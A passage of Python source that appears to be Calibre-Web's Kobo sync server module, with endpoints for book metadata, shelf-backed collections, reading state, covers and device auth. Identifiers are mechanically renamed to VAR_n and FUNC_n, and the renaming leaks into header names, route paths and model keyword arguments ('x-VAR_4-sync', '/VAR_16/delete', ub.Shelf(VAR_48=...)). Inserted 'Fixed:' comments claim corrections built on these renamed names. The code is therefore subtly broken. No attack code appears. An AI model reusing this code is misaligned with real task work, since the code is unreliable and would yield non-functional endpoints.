            VAR_79 = VAR_35.json()
            VAR_9 += VAR_79
            VAR_7.merge_from_store_response(VAR_35)
            VAR_43["x-VAR_4-sync"] = VAR_35.headers.get("x-VAR_4-sync")
            VAR_43["x-VAR_4-sync-mode"] = VAR_35.headers.get("x-VAR_4-sync-mode")
            VAR_43["x-VAR_4-recent-reads"] = VAR_35.headers.get("x-VAR_4-recent-reads")
        except Exception as ex:
            VAR_5.error("Failed to receive or parse VAR_44 from Kobo's sync endpoint: {}".format(ex))
    if VAR_10:
        VAR_43["x-VAR_4-sync"] = "continue"
    # Persist the advanced token back into the response headers.
    VAR_7.to_headers(VAR_43)
    VAR_44 = make_response(jsonify(VAR_9), VAR_43)
    return VAR_44
@VAR_4.route("/v1/library/<VAR_11>/metadata")
@requires_kobo_auth
@download_required
def FUNC_7(VAR_11):
    """Return Kobo metadata for the book with uuid VAR_11 (proxy/empty on miss)."""
    if not current_app.wsgi_app.is_proxied:
        VAR_5.debug('Kobo: Received unproxied request, changed request port to external server port')
    VAR_5.info("Kobo library VAR_45 request received for VAR_12 %s" % VAR_11)
    VAR_12 = calibre_db.get_book_by_uuid(VAR_11)
    if not VAR_12 or not VAR_12.data:
        VAR_5.info(u"Book %s not found in database", VAR_11)
        return FUNC_3()
    VAR_45 = FUNC_16(VAR_12)
    return jsonify([VAR_45])
def FUNC_8(VAR_12, VAR_13):
    """Return an absolute download URL for *VAR_12* in format *VAR_13*.

    When the request did not come through a proxy, the URL is rebuilt
    against the configured external port instead of the port Flask saw.
    """
    if not current_app.wsgi_app.is_proxied:
        if ':' in request.host and not request.host.endswith(']'):
            VAR_80 = "".join(request.host.split(':')[:-1])
        else:
            VAR_80 = request.host
        return "{url_scheme}://{url_base}:{url_port}/VAR_4/{auth_token}/download/{VAR_21}/{VAR_13}".format(
            url_scheme=request.scheme,
            url_base=VAR_80,
            url_port=config.config_external_port,
            auth_token=get_auth_token(),
            VAR_21=VAR_12.id,
            VAR_13=VAR_13.lower()  # fixed: was the undefined pre-rename name 'book_format'
        )
    return url_for(
        "kobo.download_book",
        auth_token=kobo_auth.get_auth_token(),
        VAR_21=VAR_12.id,
        VAR_13=VAR_13.lower(),  # fixed: was the undefined pre-rename name 'book_format'
        _external=True,
    )
def FUNC_9(VAR_12, VAR_14):
    """Build the Kobo 'BookEntitlement' payload for *VAR_12*.

    VAR_14 marks the entitlement as removed (book archived on the device).
    """
    entitlement_uuid = VAR_12.uuid
    payload = {
        "Accessibility": "Full",
        "ActivePeriod": {"From": FUNC_4(datetime.datetime.now())},
        "Created": FUNC_4(VAR_12.timestamp),
        "CrossRevisionId": entitlement_uuid,
        "Id": entitlement_uuid,
        "IsRemoved": VAR_14,
        "IsHiddenFromArchive": False,
        "IsLocked": False,
        "LastModified": FUNC_4(VAR_12.last_modified),
        "OriginCategory": "Imported",
        "RevisionId": entitlement_uuid,
        "Status": "Active",
    }
    return payload
def FUNC_10():
    """Return the current UTC time formatted for the Kobo API."""
    now_utc = gmtime()
    return strftime("%Y-%m-%dT%H:%M:%SZ", now_utc)
def FUNC_11(VAR_12):
    """Return the book's first comment text, or None when it has none."""
    comments = VAR_12.comments
    if comments:
        return comments[0].text
    return None
def FUNC_12(VAR_12):
    """Build the Kobo contributor fields from the book's author list.

    A single author is reported as a bare string; several authors as lists.
    """
    authors = VAR_12.authors
    if not authors:
        return {"Contributors": None}
    if len(authors) == 1:
        only_author = authors[0].name
        return {"ContributorRoles": [{"Name": only_author, "Role": "Author"}],
                "Contributors": only_author}
    roles = [{"Name": author.name, "Role": "Author"} for author in authors]
    names = [author.name for author in authors]
    return {"ContributorRoles": roles, "Contributors": names}
def FUNC_13(VAR_12):
    """Return the book's first publisher name, or None when unset."""
    publishers = VAR_12.publishers
    return publishers[0].name if publishers else None
def FUNC_14(VAR_12):
    """Return the book's first series name, or None when it has no series."""
    series = VAR_12.series
    return series[0].name if series else None
def FUNC_15(VAR_12):
    """Return the book's series index, defaulting to 1 when falsy/unset."""
    index = VAR_12.series_index
    if index:
        return index
    return 1
def FUNC_16(VAR_12):
    """Build the Kobo 'BookMetadata' payload for *VAR_12*."""
    VAR_46 = []
    # Prefer KEPUB when present; otherwise offer every stored format.
    VAR_47 = [data for data in VAR_12.data if data.format == 'KEPUB']
    for book_data in VAR_47 if len(VAR_47) > 0 else VAR_12.data:
        if book_data.format not in VAR_0:
            continue
        # One download entry per Kobo identifier mapped to this format.
        for kobo_format in VAR_0[book_data.format]:
            VAR_46.append(
                {
                    "Format": kobo_format,
                    "Size": book_data.uncompressed_size,
                    "Url": FUNC_8(VAR_12, book_data.format),
                    "Platform": "Generic",
                }
            )
    VAR_11 = VAR_12.uuid
    VAR_45 = {
        "Categories": ["00000000-0000-0000-0000-000000000001", ],
        "CoverImageId": VAR_11,
        "CrossRevisionId": VAR_11,
        "CurrentDisplayPrice": {"CurrencyCode": "USD", "TotalAmount": 0},
        "CurrentLoveDisplayPrice": {"TotalAmount": 0},
        "Description": FUNC_11(VAR_12),
        "DownloadUrls": VAR_46,
        "EntitlementId": VAR_11,
        "ExternalIds": [],
        "Genre": "00000000-0000-0000-0000-000000000001",
        "IsEligibleForKoboLove": False,
        "IsInternetArchive": False,
        "IsPreOrder": False,
        "IsSocialEnabled": True,
        "Language": "en",
        "PhoneticPronunciations": {},
        "PublicationDate": VAR_12.pubdate,
        "Publisher": {"Imprint": "", "Name": FUNC_13(VAR_12),},
        "RevisionId": VAR_11,
        "Title": VAR_12.title,
        "WorkId": VAR_11,
    }
    VAR_45.update(FUNC_12(VAR_12))
    if FUNC_14(VAR_12):
        # Encode for Python 2 compatibility when deriving the series UUID.
        if sys.version_info < (3, 0):
            VAR_48 = FUNC_14(VAR_12).encode("utf-8")
        else:
            VAR_48 = FUNC_14(VAR_12)
        VAR_45["Series"] = {
            "Name": FUNC_14(VAR_12),
            "Number": FUNC_15(VAR_12),  # ToDo Check int() ?
            "NumberFloat": float(FUNC_15(VAR_12)),
            # Series id is derived deterministically from the series name.
            "Id": uuid.uuid3(uuid.NAMESPACE_DNS, VAR_48),
        }
    return VAR_45
@csrf.exempt
@VAR_4.route("/v1/library/tags", methods=["POST", "DELETE"])
@requires_kobo_auth
def FUNC_17():
    """Create a Kobo collection (tag), backed by a CalibreWeb shelf.

    Expects JSON with 'Name' and 'Items'; returns the shelf uuid with 201.
    """
    if request.method == "DELETE":
        abort(405)
    VAR_48, VAR_16 = None, None
    try:
        VAR_73 = request.json
        VAR_48 = VAR_73["Name"]
        VAR_16 = VAR_73["Items"]
        if not VAR_48:
            raise TypeError
    except (KeyError, TypeError):
        VAR_5.debug("Received malformed v1/library/tags request.")
        abort(400, description="Malformed tags POST request. Data has empty 'Name', missing 'Name' or 'Items' field")
    VAR_17 = ub.session.query(ub.Shelf).filter(ub.Shelf.name == VAR_48, ub.Shelf.user_id ==
                                               current_user.id).one_or_none()
    if VAR_17 and not shelf_lib.check_shelf_edit_permissions(VAR_17):
        abort(401, description="User is unauthaurized to create VAR_17.")
    if not VAR_17:
        # Fixed: the shelf name was passed under its undefined pre-rename
        # identifier ('name'), raising NameError at runtime.
        VAR_17 = ub.Shelf(user_id=current_user.id, VAR_48=VAR_48, uuid=str(uuid.uuid4()))
        ub.session.add(VAR_17)
    VAR_49 = FUNC_19(VAR_16, VAR_17)
    if VAR_49:
        VAR_5.debug("Received request to add unknown VAR_65 to a collection. Silently ignoring VAR_16.")
    ub.session_commit()
    return make_response(jsonify(str(VAR_17.uuid)), 201)
@VAR_4.route("/v1/library/tags/<VAR_15>", methods=["DELETE", "PUT"])
@requires_kobo_auth
def FUNC_18(VAR_15):
    """Delete (DELETE) or rename (PUT) the shelf backing Kobo collection VAR_15."""
    VAR_17 = ub.session.query(ub.Shelf).filter(ub.Shelf.uuid == VAR_15,
                                               ub.Shelf.user_id == current_user.id).one_or_none()
    if not VAR_17:
        VAR_5.debug("Received Kobo VAR_53 update request on a collection unknown to CalibreWeb")
        if config.config_kobo_proxy:
            return FUNC_3()
        else:
            abort(404, description="Collection isn't known to CalibreWeb")
    if not shelf_lib.check_shelf_edit_permissions(VAR_17):
        abort(401, description="User is unauthaurized to edit VAR_17.")
    if request.method == "DELETE":
        shelf_lib.delete_shelf_helper(VAR_17)
    else:
        # PUT renames the shelf to the 'Name' field of the JSON body.
        VAR_48 = None
        try:
            VAR_73 = request.json
            VAR_48 = VAR_73["Name"]
        except (KeyError, TypeError):
            VAR_5.debug("Received malformed v1/library/tags rename request.")
            abort(400, description="Malformed tags POST request. Data is missing 'Name' field")
        VAR_17.name = VAR_48
        ub.session.merge(VAR_17)
        ub.session_commit()
    return make_response(' ', 200)
def FUNC_19(VAR_16, VAR_17):
    """Add Kobo tag items (book revisions) to shelf *VAR_17*.

    Items that are not book revisions or reference unknown books are
    collected and returned so the caller can log them.
    """
    VAR_50 = set([book_shelf.book_id for book_shelf in VAR_17.books])
    VAR_49 = []
    for item in VAR_16:
        try:
            if item["Type"] != "ProductRevisionTagItem":
                VAR_49.append(item)
                continue
            VAR_12 = calibre_db.get_book_by_uuid(item["RevisionId"])
            if not VAR_12:
                VAR_49.append(item)
                continue
            VAR_21 = VAR_12.id
            if VAR_21 not in VAR_50:
                # Fixed: the book id was passed under its undefined
                # pre-rename identifier ('book_id'), raising NameError.
                VAR_17.books.append(ub.BookShelf(VAR_21=VAR_21))
        except KeyError:
            VAR_49.append(item)
    return VAR_49
@csrf.exempt
@VAR_4.route("/v1/library/tags/<VAR_15>/items", methods=["POST"])
@requires_kobo_auth
def FUNC_20(VAR_15):
    """Add the posted items to the shelf backing Kobo collection VAR_15."""
    VAR_16 = None
    try:
        VAR_74 = request.json
        VAR_16 = VAR_74["Items"]
    except (KeyError, TypeError):
        VAR_5.debug("Received malformed v1/library/tags/<VAR_15>/VAR_16/delete request.")
        abort(400, description="Malformed tags POST request. Data is missing 'Items' field")
    VAR_17 = ub.session.query(ub.Shelf).filter(ub.Shelf.uuid == VAR_15,
                                               ub.Shelf.user_id == current_user.id).one_or_none()
    if not VAR_17:
        VAR_5.debug("Received Kobo request on a collection unknown to CalibreWeb")
        abort(404, description="Collection isn't known to CalibreWeb")
    if not shelf_lib.check_shelf_edit_permissions(VAR_17):
        abort(401, description="User is unauthaurized to edit VAR_17.")
    # Unknown items are deliberately ignored (logged only).
    VAR_49 = FUNC_19(VAR_16, VAR_17)
    if VAR_49:
        VAR_5.debug("Received request to add an unknown VAR_12 to a collection. Silently ignoring item.")
    ub.session.merge(VAR_17)
    ub.session_commit()
    return make_response('', 201)
@csrf.exempt
@VAR_4.route("/v1/library/tags/<VAR_15>/VAR_16/delete", methods=["POST"])
@requires_kobo_auth
def FUNC_21(VAR_15):
    """Remove the posted items from the shelf backing Kobo collection VAR_15."""
    VAR_16 = None
    try:
        VAR_74 = request.json
        VAR_16 = VAR_74["Items"]
    except (KeyError, TypeError):
        VAR_5.debug("Received malformed v1/library/tags/<VAR_15>/VAR_16/delete request.")
        abort(400, description="Malformed tags POST request. Data is missing 'Items' field")
    VAR_17 = ub.session.query(ub.Shelf).filter(ub.Shelf.uuid == VAR_15,
                                               ub.Shelf.user_id == current_user.id).one_or_none()
    if not VAR_17:
        VAR_5.debug(
            "Received a request to remove an item from a Collection unknown to CalibreWeb.")
        abort(404, description="Collection isn't known to CalibreWeb")
    if not shelf_lib.check_shelf_edit_permissions(VAR_17):
        abort(401, description="User is unauthaurized to edit VAR_17.")
    VAR_49 = []
    for item in VAR_16:
        try:
            # Only book revisions are supported; other item types are skipped.
            if item["Type"] != "ProductRevisionTagItem":
                VAR_49.append(item)
                continue
            VAR_12 = calibre_db.get_book_by_uuid(item["RevisionId"])
            if not VAR_12:
                VAR_49.append(item)
                continue
            VAR_17.books.filter(ub.BookShelf.book_id == VAR_12.id).delete()
        except KeyError:
            VAR_49.append(item)
    ub.session_commit()
    if VAR_49:
        VAR_5.debug("Received request to remove an unknown VAR_12 to a collecition. Silently ignoring item.")
    return make_response('', 200)
def FUNC_22(VAR_7, VAR_9, VAR_18=False):
    """Append collection (shelf/tag) changes since the sync token to VAR_9.

    Emits DeletedTag entries for archived shelves, then New/ChangedTag
    entries for shelves changed since the token, and advances the token's
    tags_last_modified high-water mark.
    """
    VAR_51 = VAR_7.tags_last_modified
    # Shelves the user deleted (archived) since the last sync.
    for VAR_17 in ub.session.query(ub.ShelfArchive).filter(
        func.datetime(ub.ShelfArchive.last_modified) > VAR_7.tags_last_modified,
        ub.ShelfArchive.user_id == current_user.id
    ):
        VAR_51 = max(VAR_17.last_modified, VAR_51)
        VAR_9.append({
            "DeletedTag": {
                "Tag": {
                    "Id": VAR_17.uuid,
                    "LastModified": FUNC_4(VAR_17.last_modified)
                }
            }
        })
    VAR_52 = []
    if VAR_18:
        # Only-kobo-shelves mode: report non-synced shelves as deleted tags.
        for VAR_17 in ub.session.query(ub.Shelf).filter(
            func.datetime(ub.Shelf.last_modified) > VAR_7.tags_last_modified,
            ub.Shelf.user_id == current_user.id,
            # NOTE(review): Python 'not' on a SQLAlchemy column looks suspicious
            # here — presumably a SQL-level negation was intended; confirm upstream.
            not ub.Shelf.kobo_sync
        ):
            VAR_9.append({
                "DeletedTag": {
                    "Tag": {
                        "Id": VAR_17.uuid,
                        "LastModified": FUNC_4(VAR_17.last_modified)
                    }
                }
            })
        # Extra filter applied to the changed-shelves query below.
        VAR_52.append(ub.Shelf.kobo_sync)
    if sqlalchemy_version2:
        VAR_75 = ub.session.execute(select(ub.Shelf).outerjoin(ub.BookShelf).filter(
            or_(func.datetime(ub.Shelf.last_modified) > VAR_7.tags_last_modified,
                func.datetime(ub.BookShelf.date_added) > VAR_7.tags_last_modified),
            ub.Shelf.user_id == current_user.id,
            *VAR_52
        ).distinct().order_by(func.datetime(ub.Shelf.last_modified).asc())).columns(ub.Shelf)
    else:
        VAR_75 = ub.session.query(ub.Shelf).outerjoin(ub.BookShelf).filter(
            or_(func.datetime(ub.Shelf.last_modified) > VAR_7.tags_last_modified,
                func.datetime(ub.BookShelf.date_added) > VAR_7.tags_last_modified),
            ub.Shelf.user_id == current_user.id,
            *VAR_52
        ).distinct().order_by(func.datetime(ub.Shelf.last_modified).asc())
    for VAR_17 in VAR_75:
        if not shelf_lib.check_shelf_view_permissions(VAR_17):
            continue
        VAR_51 = max(VAR_17.last_modified, VAR_51)
        VAR_53 = FUNC_23(VAR_17)
        if not VAR_53:
            continue
        # Shelves created after the token are 'new'; otherwise 'changed'.
        if VAR_17.created > VAR_7.tags_last_modified:
            VAR_9.append({
                "NewTag": VAR_53
            })
        else:
            VAR_9.append({
                "ChangedTag": VAR_53
            })
    VAR_7.tags_last_modified = VAR_51
    ub.session_commit()
def FUNC_23(VAR_17):
    """Build the Kobo 'Tag' payload for shelf *VAR_17*, listing its books as items."""
    VAR_53 = {
        "Created": FUNC_4(VAR_17.created),
        "Id": VAR_17.uuid,
        "Items": [],
        "LastModified": FUNC_4(VAR_17.last_modified),
        "Name": VAR_17.name,
        "Type": "UserTag"
    }
    for book_shelf in VAR_17.books:
        VAR_12 = calibre_db.get_book(book_shelf.book_id)
        if not VAR_12:
            # Shelf entry points at a book no longer in the Calibre DB; skip it.
            VAR_5.info(u"Book (id: %s) in BookShelf (id: %s) not found in VAR_12 database", book_shelf.book_id, VAR_17.id)
            continue
        VAR_53["Items"].append(
            {
                "RevisionId": VAR_12.uuid,
                "Type": "ProductRevisionTagItem"
            }
        )
    return {"Tag": VAR_53}
@VAR_4.route("/v1/library/<VAR_11>/state", methods=["GET", "PUT"])
@requires_kobo_auth
def FUNC_24(VAR_11):
    """Read (GET) or update (PUT) the Kobo reading state of book VAR_11.

    PUT applies the first entry of the 'ReadingStates' JSON list: bookmark,
    statistics, and read-status sections are each optional.
    """
    VAR_12 = calibre_db.get_book_by_uuid(VAR_11)
    if not VAR_12 or not VAR_12.data:
        VAR_5.info(u"Book %s not found in database", VAR_11)
        return FUNC_3()
    VAR_22 = FUNC_28(VAR_12.id)
    if request.method == "GET":
        return jsonify([FUNC_29(VAR_12, VAR_22)])
    else:
        VAR_76 = {"EntitlementId": VAR_11}
        try:
            VAR_81 = request.json
            VAR_82 = VAR_81["ReadingStates"][0]
            VAR_83 = VAR_82["CurrentBookmark"]
            if VAR_83:
                VAR_25 = VAR_22.current_bookmark
                VAR_25.progress_percent = VAR_83["ProgressPercent"]
                VAR_25.content_source_progress_percent = VAR_83["ContentSourceProgressPercent"]
                VAR_87 = VAR_83["Location"]
                if VAR_87:
                    VAR_25.location_value = VAR_87["Value"]
                    VAR_25.location_type = VAR_87["Type"]
                    VAR_25.location_source = VAR_87["Source"]
                VAR_76["CurrentBookmarkResult"] = {"Result": "Success"}
            VAR_84 = VAR_82["Statistics"]
            if VAR_84:
                VAR_24 = VAR_22.statistics
                VAR_24.spent_reading_minutes = int(VAR_84["SpentReadingMinutes"])
                VAR_24.remaining_time_minutes = int(VAR_84["RemainingTimeMinutes"])
                VAR_76["StatisticsResult"] = {"Result": "Success"}
            VAR_85 = VAR_82["StatusInfo"]
            if VAR_85:
                VAR_23 = VAR_22.book_read_link
                VAR_88 = FUNC_26(VAR_85["Status"])
                # Count a new reading session when the status flips to 'Reading'.
                if VAR_88 == ub.ReadBook.STATUS_IN_PROGRESS \
                        and VAR_88 != VAR_23.read_status:
                    VAR_23.times_started_reading += 1
                    VAR_23.last_time_started_reading = datetime.datetime.utcnow()
                VAR_23.read_status = VAR_88
                VAR_76["StatusInfoResult"] = {"Result": "Success"}
        except (KeyError, TypeError, ValueError, StatementError):
            VAR_5.debug("Received malformed v1/library/<VAR_11>/state request.")
            ub.session.rollback()
            abort(400, description="Malformed request data is missing 'ReadingStates' key")
        ub.session.merge(VAR_22)
        ub.session_commit()
        return jsonify({
            "RequestResult": "Success",
            "UpdateResults": [VAR_76],
        })
def FUNC_25(VAR_19):
    """Translate an internal read status into the Kobo status string."""
    status_names = {
        None: "ReadyToRead",
        ub.ReadBook.STATUS_UNREAD: "ReadyToRead",
        ub.ReadBook.STATUS_FINISHED: "Finished",
        ub.ReadBook.STATUS_IN_PROGRESS: "Reading",
    }
    return status_names[VAR_19.read_status]
def FUNC_26(VAR_20):
    """Translate a Kobo status string into the internal read-status constant."""
    status_values = {
        None: None,
        "ReadyToRead": ub.ReadBook.STATUS_UNREAD,
        "Finished": ub.ReadBook.STATUS_FINISHED,
        "Reading": ub.ReadBook.STATUS_IN_PROGRESS,
    }
    return status_values[VAR_20]
def FUNC_27(VAR_21):
    """Record that book VAR_21 was delivered to the current user's Kobo device."""
    synced_entry = ub.KoboSyncedBooks()
    synced_entry.user_id = current_user.id
    synced_entry.book_id = VAR_21
    ub.session.add(synced_entry)
    try:
        ub.session.commit()
    except Exception:
        # Best effort: e.g. the entry may already exist; keep the session usable.
        ub.session.rollback()
def FUNC_28(VAR_21):
    """Fetch (or lazily create) the Kobo reading state for book VAR_21 and the current user."""
    VAR_23 = ub.session.query(ub.ReadBook).filter(ub.ReadBook.book_id == VAR_21,
                                                  ub.ReadBook.user_id == current_user.id).one_or_none()
    if not VAR_23:
        # Fixed: the new record was bound to a stale pre-rename name
        # ('book_read'), leaving VAR_23 None and crashing below; the book id
        # was likewise referenced under its pre-rename name ('book_id').
        VAR_23 = ub.ReadBook(user_id=current_user.id, VAR_21=VAR_21)
    if not VAR_23.kobo_reading_state:
        VAR_22 = ub.KoboReadingState(user_id=VAR_23.user_id, VAR_21=VAR_21)
        VAR_22.current_bookmark = ub.KoboBookmark()
        VAR_22.statistics = ub.KoboStatistics()
        VAR_23.kobo_reading_state = VAR_22
        ub.session.add(VAR_23)
        ub.session_commit()
    return VAR_23.kobo_reading_state
def FUNC_29(VAR_12, VAR_22):
    """Assemble the Kobo 'ReadingState' payload for a book."""
    payload = {
        "EntitlementId": VAR_12.uuid,
        "Created": FUNC_4(VAR_12.timestamp),
        "LastModified": FUNC_4(VAR_22.last_modified),
        # Priority timestamp decides which side wins on conflicting updates.
        "PriorityTimestamp": FUNC_4(VAR_22.priority_timestamp),
        "StatusInfo": FUNC_30(VAR_22.book_read_link),
        "Statistics": FUNC_31(VAR_22.statistics),
        "CurrentBookmark": FUNC_32(VAR_22.current_bookmark),
    }
    return payload
def FUNC_30(VAR_23):
    """Build the 'StatusInfo' section of a reading-state response."""
    status_info = {
        "LastModified": FUNC_4(VAR_23.last_modified),
        "Status": FUNC_25(VAR_23),
        "TimesStartedReading": VAR_23.times_started_reading,
    }
    last_started = VAR_23.last_time_started_reading
    if last_started:
        status_info["LastTimeStartedReading"] = FUNC_4(last_started)
    return status_info
def FUNC_31(VAR_24):
    """Build the 'Statistics' section of a reading-state response."""
    stats = {
        "LastModified": FUNC_4(VAR_24.last_modified),
    }
    # Optional fields are only emitted when set (truthy).
    spent = VAR_24.spent_reading_minutes
    if spent:
        stats["SpentReadingMinutes"] = spent
    remaining = VAR_24.remaining_time_minutes
    if remaining:
        stats["RemainingTimeMinutes"] = remaining
    return stats
def FUNC_32(VAR_25):
    """Build the 'CurrentBookmark' section of a reading-state response."""
    bookmark = {
        "LastModified": FUNC_4(VAR_25.last_modified),
    }
    # Optional fields are only emitted when set (truthy).
    if VAR_25.progress_percent:
        bookmark["ProgressPercent"] = VAR_25.progress_percent
    if VAR_25.content_source_progress_percent:
        bookmark["ContentSourceProgressPercent"] = VAR_25.content_source_progress_percent
    if VAR_25.location_value:
        bookmark["Location"] = {
            "Value": VAR_25.location_value,
            "Type": VAR_25.location_type,
            "Source": VAR_25.location_source,
        }
    return bookmark
# Fixed: the defaults key must name the view argument (VAR_28); the stale
# pre-rename key 'Quality' left VAR_28 unset for the short route variant.
@VAR_4.route("/<VAR_11>/<VAR_26>/<VAR_27>/<VAR_29>/image.jpg", defaults={'VAR_28': ""})
@VAR_4.route("/<VAR_11>/<VAR_26>/<VAR_27>/<VAR_28>/<VAR_29>/image.jpg")
@requires_kobo_auth
def FUNC_33(VAR_11, VAR_26, VAR_27, VAR_28, VAR_29):
    """Serve a book cover image, proxying unknown covers to Kobo when enabled."""
    VAR_58 = helper.get_book_cover_with_uuid(
        VAR_11, use_generic_cover_on_failure=False
    )
    if not VAR_58:
        if config.config_kobo_proxy:
            VAR_5.debug("Cover for unknown VAR_12: %s proxied to kobo" % VAR_11)
            # Fixed: format arguments referenced undefined pre-rename names
            # ('book_uuid', 'width', 'height'), raising NameError at runtime.
            return redirect(VAR_2 +
                            "/{VAR_11}/{VAR_26}/{VAR_27}/false/image.jpg".format(VAR_11=VAR_11,
                                                                                 VAR_26=VAR_26,
                                                                                 VAR_27=VAR_27), 307)
        else:
            VAR_5.debug("Cover for unknown VAR_12: %s requested" % VAR_11)
            return make_response(jsonify({}))
    VAR_5.debug("Cover request received for VAR_12 %s" % VAR_11)
    return VAR_58
@VAR_4.route("")
def FUNC_34():
    """Catch-all for the blueprint root: answer an empty JSON object."""
    empty_body = jsonify({})
    return make_response(empty_body)
@VAR_4.route("/v1/library/<VAR_11>", methods=["DELETE"])
@requires_kobo_auth
def FUNC_35(VAR_11):
    """Handle a Kobo 'delete' by archiving book VAR_11 for the current user."""
    VAR_5.info("Kobo VAR_12 deletion request received for VAR_12 %s" % VAR_11)
    VAR_12 = calibre_db.get_book_by_uuid(VAR_11)
    if not VAR_12:
        VAR_5.info(u"Book %s not found in database", VAR_11)
        return FUNC_3()
    VAR_21 = VAR_12.id
    VAR_59 = (
        ub.session.query(ub.ArchivedBook)
        .filter(ub.ArchivedBook.book_id == VAR_21)
        .first()
    )
    if not VAR_59:
        # Fixed: the new record was bound to a stale pre-rename name
        # ('archived_book'), leaving VAR_59 None and crashing below; the book
        # id was likewise referenced under its pre-rename name ('book_id').
        VAR_59 = ub.ArchivedBook(user_id=current_user.id, VAR_21=VAR_21)
    VAR_59.is_archived = True
    VAR_59.last_modified = datetime.datetime.utcnow()
    ub.session.merge(VAR_59)
    ub.session_commit()
    return ("", 204)
@VAR_4.route("/v1/library/<VAR_30>", methods=["DELETE", "GET"])
def FUNC_36(VAR_30=None):
    """Fallback for unimplemented library endpoints: log, then proxy or answer {}."""
    VAR_5.debug("Unimplemented Library Request received: %s", request.base_url)
    fallback_response = FUNC_3()
    return fallback_response
@csrf.exempt
@VAR_4.route("/v1/user/loyalty/<VAR_30>", methods=["GET", "POST"])
@VAR_4.route("/v1/user/profile", methods=["GET", "POST"])
@VAR_4.route("/v1/user/wishlist", methods=["GET", "POST"])
@VAR_4.route("/v1/user/recommendations", methods=["GET", "POST"])
@VAR_4.route("/v1/analytics/<VAR_30>", methods=["GET", "POST"])
def FUNC_37(VAR_30=None):
    """Fallback for unimplemented user endpoints: log, then proxy or answer {}."""
    VAR_5.debug("Unimplemented User Request received: %s", request.base_url)
    fallback_response = FUNC_3()
    return fallback_response
@csrf.exempt
@VAR_4.route("/v1/products/<VAR_30>/prices", methods=["GET", "POST"])
@VAR_4.route("/v1/products/<VAR_30>/recommendations", methods=["GET", "POST"])
@VAR_4.route("/v1/products/<VAR_30>/nextread", methods=["GET", "POST"])
@VAR_4.route("/v1/products/<VAR_30>/reviews", methods=["GET", "POST"])
@VAR_4.route("/v1/products/VAR_65/external/<VAR_30>", methods=["GET", "POST"])
@VAR_4.route("/v1/products/VAR_65/series/<VAR_30>", methods=["GET", "POST"])
@VAR_4.route("/v1/products/VAR_65/<VAR_30>", methods=["GET", "POST"])
@VAR_4.route("/v1/products/dailydeal", methods=["GET", "POST"])
@VAR_4.route("/v1/products", methods=["GET", "POST"])
def FUNC_38(VAR_30=None):
    """Fallback for unimplemented product endpoints: log, then proxy or answer {}."""
    VAR_5.debug("Unimplemented Products Request received: %s", request.base_url)
    fallback_response = FUNC_3()
    return fallback_response
def FUNC_39():
    """Answer a Kobo device-auth request with freshly generated tokens."""
    request_payload = request.get_json()

    def _random_token():
        # 24 random bytes, base64-encoded.
        return base64.b64encode(os.urandom(24)).decode('utf-8')

    body = {
        "AccessToken": _random_token(),
        "RefreshToken": _random_token(),
        "TokenType": "Bearer",
        "TrackingId": str(uuid.uuid4()),
        "UserKey": request_payload['UserKey'],
    }
    return make_response(jsonify(body))
@csrf.exempt
@VAR_4.route("/v1/auth/device", methods=["POST"])
@requires_kobo_auth
def FUNC_40():
    """Handle Kobo device authentication, proxying to the store when enabled."""
    VAR_5.debug('Kobo Auth request')
    if config.config_kobo_proxy:
        try:
            return FUNC_3()
        except Exception:
            VAR_5.error("Failed to receive or parse VAR_44 from Kobo's auth endpoint. Falling back to un-proxied mode.")
    # Un-proxied mode: issue locally generated tokens.
    return FUNC_39()
@VAR_4.route("/v1/initialization")
@requires_kobo_auth
def FUNC_41():
    """Answer the Kobo init call with the resource map the device will use.

    When proxying is enabled, the real store resources are fetched;
    otherwise (or on failure) the hard-coded map from FUNC_43 is used.
    Image URLs are rewritten so covers are served from this server.
    """
    VAR_5.info('Init')
    VAR_63 = None
    if config.config_kobo_proxy:
        try:
            VAR_35 = FUNC_2()
            VAR_86 = VAR_35.json()
            if "Resources" in VAR_86:
                VAR_63 = VAR_86["Resources"]
        except Exception:
            VAR_5.error("Failed to receive or parse VAR_44 from Kobo's init endpoint. Falling back to un-proxied mode.")
    if not VAR_63:
        # Fixed: the fallback was bound to a stale pre-rename name
        # ('kobo_resources'), leaving VAR_63 None and crashing below.
        VAR_63 = FUNC_43()
    if not current_app.wsgi_app.is_proxied:
        VAR_5.debug('Kobo: Received unproxied request, changed request port to external server port')
        if ':' in request.host and not request.host.endswith(']'):
            VAR_80 = "".join(request.host.split(':')[:-1])
        else:
            VAR_80 = request.host
        VAR_77 = "{url_scheme}://{url_base}:{url_port}".format(
            url_scheme=request.scheme,
            url_base=VAR_80,
            url_port=config.config_external_port
        )
        VAR_5.debug('Kobo: Received unproxied request, changed request url to %s', VAR_77)
        VAR_63["image_host"] = VAR_77
        VAR_63["image_url_quality_template"] = unquote(VAR_77 +
                                                       url_for("kobo.HandleCoverImageRequest",
                                                               auth_token=kobo_auth.get_auth_token(),
                                                               VAR_11="{ImageId}",
                                                               VAR_26="{VAR_26}",
                                                               VAR_27="{VAR_27}",
                                                               VAR_28='{VAR_28}',
                                                               VAR_29='isGreyscale'))
        VAR_63["image_url_template"] = unquote(VAR_77 +
                                               url_for("kobo.HandleCoverImageRequest",
                                                       auth_token=kobo_auth.get_auth_token(),
                                                       VAR_11="{ImageId}",
                                                       VAR_26="{VAR_26}",
                                                       VAR_27="{VAR_27}",
                                                       VAR_29='false'))
    else:
        VAR_63["image_host"] = url_for("web.index", _external=True).strip("/")
        VAR_63["image_url_quality_template"] = unquote(url_for("kobo.HandleCoverImageRequest",
                                                               auth_token=kobo_auth.get_auth_token(),
                                                               VAR_11="{ImageId}",
                                                               VAR_26="{VAR_26}",
                                                               VAR_27="{VAR_27}",
                                                               VAR_28='{VAR_28}',
                                                               VAR_29='isGreyscale',
                                                               _external=True))
        VAR_63["image_url_template"] = unquote(url_for("kobo.HandleCoverImageRequest",
                                                       auth_token=kobo_auth.get_auth_token(),
                                                       VAR_11="{ImageId}",
                                                       VAR_26="{VAR_26}",
                                                       VAR_27="{VAR_27}",
                                                       VAR_29='false',
                                                       _external=True))
    VAR_44 = make_response(jsonify({"Resources": VAR_63}))
    # The device expects this header; "e30=" is base64 for "{}".
    VAR_44.headers["x-VAR_4-apitoken"] = "e30="
    return VAR_44
@VAR_4.route("/download/<VAR_21>/<VAR_13>")
@requires_kobo_auth
@download_required
def FUNC_42(VAR_21, VAR_13):
    """Serve the download of book VAR_21 in format VAR_13 for a Kobo device."""
    return get_download_link(VAR_21, VAR_13, "kobo")
def FUNC_43():
    """Return the static fallback map of Kobo store endpoint URLs.

    Used when the real Kobo init endpoint cannot be reached or parsed
    (see the un-proxied fallback above): the keys mirror the "Resources"
